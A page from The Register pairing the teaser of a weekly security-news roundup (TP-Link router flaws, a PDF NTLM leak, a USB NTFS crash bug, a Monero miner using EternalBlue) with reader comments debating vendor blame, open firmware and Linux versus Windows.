Windows USB-stick-of-death, router bugs resurrected, and more Here's your summary of infosec news – from router holes to Windows crashes – beyond what we've already covered this week. TPLink? More like TPwnedLink, amiright? Anyone? Tim Carrington at Fidus Infosec went public on Thursday with not-so-new remote-code execution flaws in TPLink router firmware. We're told the security holes ( …
I think the best direction these days is to look at dd-wrt, open-wrt, tomato, gargoyle etc; decide which one you like; then look at the list of compatible hardware and choose your router from there. Vendor updates seem few and far between and only for the latest models. A decent router can last for many years - as I have little need for AC wireless my 802.11a/b/n router is still just as useful today as it was when I bought it 7 years ago - so it makes sense to go with open firmware and get timely openssl updates.
Actually, this is 100% windows bug, not a PDF one. The PDF file works as advertised. It is supposed to be able to embed remote documents (whatever that means), so it embeds them. The rest is Microsoft software.
By the way, Microsoft claims that no mitigation or workaround exist. It is not true. All you need to do is to disable SMB. It may be impossible for many corporate users but I think vast majority of Windows users should have done that long ago. I have disabled SMB almost a year ago to protect myself from the WannaCry ransomware.
actually ....nope.. It's Adobe..
As per their answer in the article:
"The issue was disclosed to Adobe which responded as shown below, without assigning any CVE or fix for the vulnerability:
“Thank you for checking in on this case. Microsoft issued an optional security enhancement [0] late last year that provides customers with the ability to disable NTLM SSO authentication as a method for public resources. With this mitigation available to customers, we are not planning to make changes in Acrobat.“ "
You can see that M$ has taken action ( however obscure, etc...). It is *Adobe* that says "this is sufficient mitigation" even though the problem itself has its root in the way a PDF document reads/executes remotely hosted inserts in a document without any fact-checking at all.
As much as I generally hate everything that Abode deliver or the way they deliver it (or both), in this case it is squarely an Operating System issue. The OS is there to process and enforce links and such actions (hence especially annoying when Microsoft break this and force links to use shite such as Edge rather than the user's choice of better browser) are OS actions and therefore externally handled by the OS shell and supporting applications. Adobe (Acrobat) shouldn't need to know, or care, about every possible URI handler or supporting application - just that these can be passed to the OS to deal with. If these happen to include file:\\ links, therefore SMB, this is an OS issue and not Acrobat.
"Bitdefender bloke Marius Tivadar has developed a dodgy NTFS file system image that crashes at least Windows 7 and 10 systems: popping it on a USB stick and then plugging that into a vulnerable computer will cause it to fall over with a blue-screen-of-death when a mount attempt is made. "
W7 also keels over when you offer it an ODS-2 formatted stick. I see a need to check if W10 has the same flaw.
I guess when someone finally releases a decent Office suite for Linux that actually does what is required? Without hours of faffing around obscure menus and settings?
Oh and also when all of the custom programs a company requires are compiled and supported in a linux environment....
If it were not for the lack of a decent office suite and support for our Hire Software I would already be using linux...
With the heavy push to Office 365 you already have full access to a browser-based suite. Or just run 2003 in Wine, also known as the least garbage edition. Personal preference aside, 2010 runs just fine too—I installed it for my parents on their GalliumOS Chromebooks. I would assume you don't like LibreOffice based on your comment, but it really does work pretty well. I have used it professionally in place of MS Office; it did miss a scant few features that I never had a need for when I used it quite a while ago, so maybe it's come farther since then.
Will your awful proprietary software not run in Wine or a VM?
" it did miss a scant few features that I never had a need for when I used it quite a while ago"
As did Microsoft word back in the days when it took over the market from the plethora of expensive competitors that were around then.
That's why things like Libreoffice terrify them. "Good enough" was good enough to allow them to take over and "Good enough" is good enough to allow someone else to whip the rug out from under their feet.
One of the problems is that there a a few things that MS Word did which have become standard in places such as the publishing industry, and the alternatives struggle with them, It's mostly centred on change-tracking on a document in the editing process. You can produce a compatible file to submit to the publisher, but there's a lot that has to be done to that version, both the obvious area of spelling errors and more complicated fine-tuning of the flow and pacing and storytelling.
It's different enough a process from ordinary office work that it doesn't surprise me. It also means that some Word bugs in the area can now be regarded as features that have to be emulated.
It looks as though Microsoft are splitting hairs over fixing it, saying that because it needs "social engineering" it isn't a software security problem.
A flawed filesystem on a USB stick shouldn't cause a blue-screen-of-death, however it gets attached.
If Department A at MS say it isn't a problem they deal with, and say they have passed the report on to Department B, who do handle those problems, that's OK. Telling you to submit it to Department B might not be the best answer, but it isn't bad.
Hardware passthrough works flawlessly in my experience with PCI devices for most modern setups, including FreeBSD bhyve, Xen with NetBSD dom0, and QEMU on OpenBSD. Alternative board-specific options such as UART, GPIO, serial, and other methods could probably be hacked together quickly enough, if it already isn't possible—I have no experience with this, however. If it's some stupid proprietary solution that doesn't feed through PCI and doesn't use any pre-existing common technology... Take the one who made that mistake aside and get hit a little.
Additionally, it is entirely the problem that software vendors ship closed-source, buggy, non-portable proprietary code that won't work on anything but a specific version of Windows Vista. Deciding not to use Windows in the workforce—even if it will cause some headache—helps increase the visibility and viability of alternative systems that otherwise would not even be considered and, if you opt for an open-source solution, you can modify your system to better suit the needs of your business. But that's just my uninformed opinion.
"software vendors ship closed-source, buggy, non-portable proprietary code that won't work on anything but a specific version of Windows Vista."
I have hardware (spectrum analysers, etc) running embedded versions of W95. They aren't going anywhere near the network for obvious reasons but I've also seen w2k in less than 10-year old MRI installations, etc.
The hardware vendor's solution is "buy new hardware" (In the latter case that's a few million dollars a pop)
Do you really think that if the Pentagon went all BSDs and Linux or let's say OpenBSD, others can also apply here, that with 3/4s of a trillion dollar budget (OK, $700 billion, damn near though) that suppliers wouldn't rewrite or write new software? The problem is that all those Officers in Procurement want a nice job with MS and suppliers of software that runs on Windows after they've retired and or for their children. Most OSS can't compete with that. Same for all other Government Procurements Departments. Same applies to hardware.
PS
All hardware drivers should be open source.
https://www.cnn.com/2018/03/28/politics/us-military-spending-items-intl/index.html
NO, because patents get in the way. True, actual hardware patents that companies fiercely protect. Not even the military can get around proprietary patents. Remember, ONLY things developed BY the government are ineligible for copyright or patent protection. Things made FOR the government BY an outside private firm are another story.
Plus there's the matter of sweetheart deals to particular congressional districts that are begging for federal money for their continued survival. So unless you're willing to kill people and communities in order to balance the budget...
"Actual hardware patents that companies fiercely protect. Not even the military can get around proprietary patents"
Actually they can. Eminent domain and all that. Look it up.
In any case, they don't need to. All the big customers need to do is specify in $BIG_CONTRACT that "This shall work on XYZ operating system and remain fully supported for ABC years".
That's why you can still buy VMS for a few more years yet.
"Actually they can. Eminent domain and all that. Look it up."
I have. That only applies to realty, and ONLY if there's a compelling government interest in it. Otherwise, the property owner can sue on those grounds and force a change to the conditions. I don't recall eminent domain being used on a patent or a copyright.
"In any case, they don't need to. All the big customers need to do is specify in $BIG_CONTRACT that "This shall work on XYZ operating system and remain fully supported for ABC years".
Until they get back: "Offers: None at any price." Not even lucrative contracts will mean much if the potential buyer doesn't see a good enough return in the offing due to hidden costs or legal risks.
"you can still buy VMS for a few more years yet."
According to some folks, it's actually looking even better than it was a couple of years ago [0].
The word on the streets as of a few days ago is that OpenVMS [1] development *and support* has left the HP[E] building, for a new home where VMS-related business has already been welcomed rather than treated like an unwanted nuisance. Itanium got the high end money and attention courtesy of HP, but OpenVMS looks likely to ultimately last longer than Itanium. As for Autonomy... thanks HP execs, you bunch of absolute numpties.
VMS on VAX is mature, the future of VMS on Alpha systems looks better than it was a couple of years ago, anyone who cares about VMS on Itanium has other bigger issues to address, and VMS on some other more familiar hardware is on the way.
[0] https://www.theregister.co.uk/2016/10/13/openvms_moves_slowly_towards_x86/
[1] The Open in OpenVMS is preferably silent and preferably unwritten, but occasionally serves to help search engine users etc distinguish VMS the operating system from VMs (as in the plural of virtual machine).
A lot of the rationale for going with Windows was that it would save the military money, since they'd be using more off-the-shelf stuff instead of custom. It hasn't necessarily worked out that way, but if they dump Windows I suspect they'll go back to their own bespoke OS's instead of moving to OpenBSD or something like that.
PyRoMine fires up EternalBlue flaw to forge Monero
"What's worse, the code spreads itself using the infamous EternalBlue and EternalRomance NSA-developed exploits."
On the 25th April we were told that the NSA had produced "Simon" and "Speck" cryptographic tools which were designed for secure data to and from the next generation of internet-of-things gizmos and sensors, and were intended to become a global standard.
Thank god ISO stopped them in their tracks. It sounds like the NSA are a greater danger to world security than all other malware writers combined.
The stack-overflow bugs can be exploited via the built-in HTTP web server
These are bugs copy-pasted from StackOverflow, right?
Oh, wait, these are actually buffer-overflow bugs. Should I say ACTUALLY buffer-overflow bugs?
Hey... wait. It's 2018? Not, like, 1988?
Inability to learn, inability to code. Inability to use modern tools.
Why doesn't this "Industry" just kill itself to get it over with?
"Hey... wait. It's 2018? Not, like, 1988?"
Send postscript to any HP printer with headers longer than 1024 bytes (the standard allows for 4096 bytes).
Watch the resulting mess with glee.
I told HP about this in 2003. They promised to fix it in 2004. We use PS for printing (most *nix houses do). Guess who's on the naughty step?
This sounds like my reaction when I found out the Nintendo Switch had been cracked with a stack-smashing buffer overflow attack on its GPU ROMs. Via a memcopy routine that accepted a length parameter from untrusted input, no less. Maybe current firmware coders have just forgotten what the software industry learned 30 years ago.
"Well technically (maybe) creative, but are they strictly forging Monero?"
The word "forge" unfortunately has three distinct meanings; to make (from fabricare, Latin to make), to make a false copy, and to make rapid progress (forge ahead).
They are forging Monero in the first sense, and perhaps in the third.
The Register 
Biting the hand that feeds IT
Copyright. All rights reserved © 1998–2024
